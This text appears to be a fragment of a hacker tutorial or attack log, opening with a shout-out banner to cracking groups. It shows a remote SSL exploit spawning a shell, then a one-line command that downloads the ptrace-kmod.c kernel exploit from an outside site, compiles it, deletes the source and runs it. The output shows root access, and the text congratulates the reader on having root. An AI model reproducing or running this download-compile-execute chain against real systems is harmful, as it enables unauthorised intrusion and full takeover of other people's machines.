* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304- 
--11:33:26-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
 => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--11:33:26-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
 => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 1.87 MB/s

11:33:27 (1.87 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 6362
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

And it works. Congrats, you have root now. Either method should work.